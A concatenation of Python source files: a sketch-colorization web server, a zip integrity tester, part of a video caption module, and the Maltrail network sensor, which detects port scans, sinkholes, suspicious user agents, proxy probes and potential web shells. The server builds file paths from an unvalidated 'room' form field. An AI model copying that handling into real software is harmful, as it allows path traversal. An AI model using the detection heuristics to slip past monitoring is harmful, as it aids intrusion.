self.caption_guide[last_caption]['stop'] = datetime.datetime.strftime(datetime.datetime.strptime(mo.group(2),"%H:%M:%S") + datetime.timedelta(seconds=self.clockbase),'%H:%M:%S')
self.caption_guide[last_caption]['caption'] = ''
elif last_caption:
if line.isdigit():
self.caption_guide[last_caption]['scene'] = int(line) - 1
else:
# TODO: remove duplicates
self.caption_guide[last_caption]['caption'] += line + ' '
# TODO: HACK. this belongs in the logger
#print('\t\t[%s] CC: ' % last_caption,line)
        if last_caption != '':
return last_caption,self.caption_guide[last_caption]['caption']
return last_caption,''
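#
# Hedged usage sketch: how a caller might drive FileVideoStream end to end.
# STREAM_URL, the 1280x720 geometry, 29.97 fps and the 16 kHz sample rate are
# illustrative assumptions, not values required by this module; read() blocks
# until the demuxer has produced the first frame packet.
#
if __name__ == '__main__' and os.environ.get('FVS_DEMO'):
    fvs = FileVideoStream(os.environ.get('STREAM_URL', 'rtsp://example.invalid/stream'))
    fvs.load(width=1280, height=720, fps=29.97, sample=16000)
    frame = fvs.read()
    print('frame', frame['frame'], 'audio level', frame.get('audio_level'))
    fvs.stop()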
|
server.py
|
from config import *
if multiple_process:
from gevent import monkey
monkey.patch_all()
import re
import os
import cv2
import time
import json
import base64
import shutil
import datetime
import threading
import numpy as np
from bottle import route, run, static_file, request, BaseRequest, response
from ai import *
from tricks import *
BaseRequest.MEMFILE_MAX = 10000 * 1000
def get_request_image(name):
img = request.forms.get(name)
img = re.sub('^data:image/.+;base64,', '', img)
img = base64.urlsafe_b64decode(img)
img = np.fromstring(img, dtype=np.uint8)
img = cv2.imdecode(img, -1)
return img
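# Hedged companion helper, not used by the server itself: builds the kind of
# base64 data-URL payload that get_request_image() expects, which is handy
# when driving the endpoints from a test script. encode_request_image is an
# illustrative addition, not part of the original API.
def encode_request_image(img):
    ok, buf = cv2.imencode('.png', img)
    assert ok, 'cv2.imencode failed'
    return 'data:image/png;base64,' + base64.b64encode(buf.tobytes()).decode('ascii')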
@route('/<filename:path>')
def send_static(filename):
return static_file(filename, root='./game')
@route('/')
def send_index():
return static_file("index.html", root='./game')
sketch_upload_pool = []
painting_pool = []
def handle_sketch_upload_pool():
if len(sketch_upload_pool) > 0:
room, sketch, method = sketch_upload_pool[0]
del sketch_upload_pool[0]
room_path = 'game/rooms/' + room
print('processing sketch in ' + room_path)
if os.path.exists(room_path + '/sketch.improved.jpg'):
improved_sketch = cv2.imread(room_path + '/sketch.improved.jpg')
print('lucky to find improved sketch')
else:
improved_sketch = sketch.copy()
improved_sketch = min_resize(improved_sketch, 512)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
improved_sketch = go_tail(improved_sketch)
cv2.imwrite(room_path + '/sketch.improved.jpg', improved_sketch)
color_sketch = improved_sketch.copy()
std = cal_std(color_sketch)
print('std = ' + str(std))
need_de_painting = (std > 100.0) and method == 'rendering'
if method=='recolorization' or need_de_painting:
if os.path.exists(room_path + '/sketch.recolorization.jpg') or os.path.exists(room_path + '/sketch.de_painting.jpg'):
print('lucky to find lined sketch')
else:
improved_sketch = go_passline(color_sketch)
improved_sketch = min_k_down_c(improved_sketch, 2)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = go_tail(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
cv2.imwrite(room_path + '/sketch.recolorization.jpg', min_black(improved_sketch))
if need_de_painting:
cv2.imwrite(room_path + '/sketch.de_painting.jpg', min_black(improved_sketch))
print('In rendering mode, the user has uploaded a painting, and I have translated it into a sketch.')
print('sketch lined')
cv2.imwrite(room_path + '/sketch.colorization.jpg', min_black(color_sketch))
cv2.imwrite(room_path + '/sketch.rendering.jpg', eye_black(color_sketch))
print('sketch improved')
return
def handle_painting_pool():
if len(painting_pool) > 0:
room, ID, sketch, alpha, reference, points, method, lineColor, line = painting_pool[0]
del painting_pool[0]
room_path = 'game/rooms/' + room
print('processing painting in ' + room_path)
sketch_1024 = k_resize(sketch, 64)
if os.path.exists(room_path + '/sketch.de_painting.jpg') and method == 'rendering':
vice_sketch_1024 = k_resize(cv2.imread(room_path + '/sketch.de_painting.jpg', cv2.IMREAD_GRAYSCALE), 64)
sketch_256 = mini_norm(k_resize(min_k_down(vice_sketch_1024, 2), 16))
sketch_128 = hard_norm(sk_resize(min_k_down(vice_sketch_1024, 4), 32))
else:
sketch_256 = mini_norm(k_resize(min_k_down(sketch_1024, 2), 16))
sketch_128 = hard_norm(sk_resize(min_k_down(sketch_1024, 4), 32))
print('sketch prepared')
if debugging:
cv2.imwrite(room_path + '/sketch.128.jpg', sketch_128)
cv2.imwrite(room_path + '/sketch.256.jpg', sketch_256)
baby = go_baby(sketch_128, opreate_normal_hint(ini_hint(sketch_128), points, type=0, length=1))
baby = de_line(baby, sketch_128)
for _ in range(16):
baby = blur_line(baby, sketch_128)
baby = go_tail(baby)
baby = clip_15(baby)
if debugging:
cv2.imwrite(room_path + '/baby.' + ID + '.jpg', baby)
print('baby born')
composition = go_gird(sketch=sketch_256, latent=d_resize(baby, sketch_256.shape), hint=ini_hint(sketch_256))
if line:
composition = emph_line(composition, d_resize(min_k_down(sketch_1024, 2), composition.shape), lineColor)
composition = go_tail(composition)
cv2.imwrite(room_path + '/composition.' + ID + '.jpg', composition)
print('composition saved')
painting_function = go_head
if method == 'rendering':
painting_function = go_neck
print('method: ' + method)
result = painting_function(
sketch=sketch_1024,
global_hint=k_resize(composition, 14),
local_hint=opreate_normal_hint(ini_hint(sketch_1024), points, type=2, length=2),
global_hint_x=k_resize(reference, 14) if reference is not None else k_resize(composition, 14),
alpha=(1 - alpha) if reference is not None else 1
)
result = go_tail(result)
cv2.imwrite(room_path + '/result.' + ID + '.jpg', result)
cv2.imwrite('results/' + room + '.' + ID + '.jpg', result)
if debugging:
cv2.imwrite(room_path + '/icon.' + ID + '.jpg', max_resize(result, 128))
return
@route('/upload_sketch', method='POST')
def upload_sketch():
room = request.forms.get("room")
previous_step = request.forms.get("step")
if previous_step == 'sample':
new_room_id = datetime.datetime.now().strftime('%b%dH%HM%MS%S') + 'R' + str(np.random.randint(100, 999))
shutil.copytree('game/samples/' + room, 'game/rooms/' + new_room_id)
print('copy ' + 'game/samples/' + room + ' to ' + 'game/rooms/' + new_room_id)
room = new_room_id
ID = datetime.datetime.now().strftime('H%HM%MS%S')
method = request.forms.get("method")
if room == 'new':
room = datetime.datetime.now().strftime('%b%dH%HM%MS%S') + 'R' + str(np.random.randint(100, 999))
room_path = 'game/rooms/' + room
os.makedirs(room_path, exist_ok=True)
sketch = from_png_to_jpg(get_request_image('sketch'))
cv2.imwrite(room_path + '/sketch.original.jpg', sketch)
print('original_sketch saved')
else:
room_path = 'game/rooms/' + room
sketch = cv2.imread(room_path + '/sketch.original.jpg')
print('sketch upload pool get request: ' + method)
sketch_upload_pool.append((room, sketch, method))
while True:
time.sleep(0.1)
if os.path.exists(room_path + '/sketch.' + method + '.jpg'):
break
time.sleep(1.0)
return room + '_' + ID
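# Hedged client-side sketch for /upload_sketch, relying on the illustrative
# encode_request_image() helper above. The default URL, the 'colorization'
# method and the 'start' step value are assumptions; the server (including its
# server_loop worker thread) must already be running for the call to return.
def _demo_upload_sketch(sketch_path, url='http://127.0.0.1:8080/upload_sketch'):
    import requests
    payload = {
        'room': 'new',
        'step': 'start',
        'method': 'colorization',
        'sketch': encode_request_image(cv2.imread(sketch_path)),
    }
    # upload_sketch() answers with the "room_ID" string used by later requests
    return requests.post(url, data=payload).text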
@route('/request_result', method='POST')
def request_result():
room = request.forms.get("room")
previous_step = request.forms.get("step")
if previous_step == 'sample':
new_room_id = datetime.datetime.now().strftime('%b%dH%HM%MS%S') + 'R' + str(np.random.randint(100, 999))
shutil.copytree('game/samples/' + room, 'game/rooms/' + new_room_id)
print('copy ' + 'game/samples/' + room + ' to ' + 'game/rooms/' + new_room_id)
room = new_room_id
ID = datetime.datetime.now().strftime('H%HM%MS%S')
room_path = 'game/rooms/' + room
options_str = request.forms.get("options")
if debugging:
with open(room_path + '/options.' + ID + '.json', 'w') as f:
f.write(options_str)
options = json.loads(options_str)
method = options["method"]
sketch = cv2.imread(room_path + '/sketch.' + method + '.jpg', cv2.IMREAD_GRAYSCALE)
alpha = float(options["alpha"])
points = options["points"]
for _ in range(len(points)):
points[_][1] = 1 - points[_][1]
if options["hasReference"]:
reference = from_png_to_jpg(get_request_image('reference'))
cv2.imwrite(room_path + '/reference.' + ID + '.jpg', reference)
reference = s_enhance(reference)
else:
reference = None
print('request result room = ' + str(room) + ', ID = ' + str(ID))
lineColor = np.array(options["lineColor"])
line = options["line"]
painting_pool.append([room, ID, sketch, alpha, reference, points, method, lineColor, line])
while True:
time.sleep(0.1)
if os.path.exists(room_path + '/result.' + ID + '.jpg'):
break
time.sleep(1.0)
return room + '_' + ID
@route('/get_sample_list', method='POST')
def get_sample_list():
all_names = []
for (root, dirs, files) in os.walk("game/samples"):
all_names = dirs
break
all_names.sort()
result = json.dumps(all_names)
return result
@route('/save_as_sample', method='POST')
def save_as_sample():
room = request.forms.get("room")
step = request.forms.get("step")
previous_path = 'game/rooms/' + room
new_path = 'game/samples/' + room
os.makedirs(new_path, exist_ok=True)
def transfer(previous_file_name, new_file_name=None):
if new_file_name is None:
new_file_name = previous_file_name
if os.path.exists(previous_path + '/' + previous_file_name):
shutil.copy(previous_path + '/' + previous_file_name, new_path + '/' + new_file_name)
transfer('sketch.original.jpg')
transfer('sketch.improved.jpg')
transfer('sketch.colorization.jpg')
transfer('sketch.rendering.jpg')
transfer('sketch.recolorization.jpg')
transfer('sketch.de_painting.jpg')
transfer('result.' + step + '.jpg', 'result.sample.jpg')
transfer('reference.' + step + '.jpg', 'reference.sample.jpg')
transfer('icon.' + step + '.jpg', 'icon.sample.jpg')
transfer('composition.' + step + '.jpg', 'composition.sample.jpg')
transfer('options.' + step + '.json', 'options.sample.json')
print('saved')
return 'ok'
def server_loop():
while True:
time.sleep(0.173)
try:
handle_sketch_upload_pool()
handle_painting_pool()
except Exception as e:
print(e)
os.makedirs('game/rooms', exist_ok=True)
os.makedirs('results', exist_ok=True)
threading.Thread(target=server_loop).start()
if multiple_process:
run(host="0.0.0.0", port=80, server='gevent')
else:
run(host="0.0.0.0", port=8080)
|
test-zip.py
|
#!/usr/bin/env python3
import sys
from multiprocessing import Process, Queue
from pathlib import Path
from zipfile import ZipFile
def test_proc(dir_path, queue):
while True:
zip_path = queue.get()
if zip_path is None:
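            # push the sentinel back so every other worker process also sees it and exits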
queue.put(None)
break
rel_path = zip_path.relative_to(dir_path)
        try:
            with ZipFile(zip_path, 'r', allowZip64=True) as zip_file:
                result = zip_file.testzip()
        except Exception as error:
            result = error
        if result is None:
            print(f'[+] {rel_path}')
        else:
            print(f'[-] {rel_path}, {result}')
def main():
if len(sys.argv) < 2:
print('usage: test-zip.py [path to directory] [proc count]')
return
dir_path = Path(sys.argv[1]).absolute()
if not dir_path.exists():
print('[-] directory does not exist')
return
proc_count = 1 # optimized for hdd
if len(sys.argv) >= 3:
proc_count = int(sys.argv[2])
procs = []
queue = Queue()
for _ in range(proc_count):
proc = Process(target=test_proc, args=(dir_path, queue,))
proc.start()
procs.append(proc)
for zip_path in dir_path.glob('**/*.zip'):
queue.put(zip_path)
queue.put(None)
for proc in procs:
proc.join()
if __name__ == '__main__':
main()
|
sensor.py
|
#!/usr/bin/env python2
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import core.versioncheck
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import sys
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import inet_ntoa6
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import load_trails
from core.enums import BLOCK_MARKER
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import LOCALHOST_IP
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import trails
from core.settings import VALID_DNS_CHARS
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_KEYWORDS
from core.update import update_ipcat
from core.update import update_trails
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if subprocess.mswindows:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg, _ = "[!] please install 'Pcapy'", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install pcapy", ("debian", "ubuntu"): "sudo apt-get install python-pcapy"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
exit(msg)
def _check_domain_member(query, domains):
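    # walks the suffixes of the query, e.g. "a.b.example.com" is checked as
    # "a.b.example.com", "b.example.com", "example.com" and "com"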
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
return _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get(query) == False:
return
result = False
if not _check_domain_whitelisted(query) and all(_ in VALID_DNS_CHARS for _ in query):
parts = query.split('.')
if getattr(trails, "_regex", None):
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A(d?ns|nf|mx)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail) and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[query] = False
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if len(_result_cache) > MAX_RESULT_CACHE_ENTRIES:
_result_cache.clear()
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
if len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
if not check_whitelisted(_src_ip):
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
iph_length = (ip_header[0] & 0xf) << 2
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
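            # fixed 40-byte IPv6 header: version/class/flow (4B), payload length (2B),
            # next header (1B), hop limit (1B), src (16B), dst (16B) - hence
            # protocol == ip_header[4] and the 16-byte addresses at indexes 6 and 7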
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or "%s:%s" % (dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = dst_ip if dst_ip in trails else "%s:%s" % (dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or "%s:%s" % (src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = src_ip if src_ip in trails else "%s:%s" % (src_ip, src_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = ip_data[h_size:]
if tcp_data.startswith("HTTP/"):
if any(_ in tcp_data[:tcp_data.find("\r\n\r\n")] for _ in ("X-Sinkhole:", "X-Malware-Sinkhole:", "Server: You got served", "Server: Apache 1.0/SinkSoft", "sinkdns.org")) or "\r\n\r\nsinkhole" in tcp_data:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = urllib.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get(user_agent)
if result is None:
if not any(_ in user_agent for _ in WHITELIST_UA_KEYWORDS):
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[user_agent] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[user_agent] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[user_agent] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = os.path.splitext(checks[-1])
if _[1]:
checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
unquoted_path = urllib.unquote(path)
unquoted_post_data = urllib.unquote(post_data or "")
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_path)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_path] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get(unquoted_post_data)
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[unquoted_post_data] = found or ""
if found:
trail = "%s(%s \(%s %s\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = urlparse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
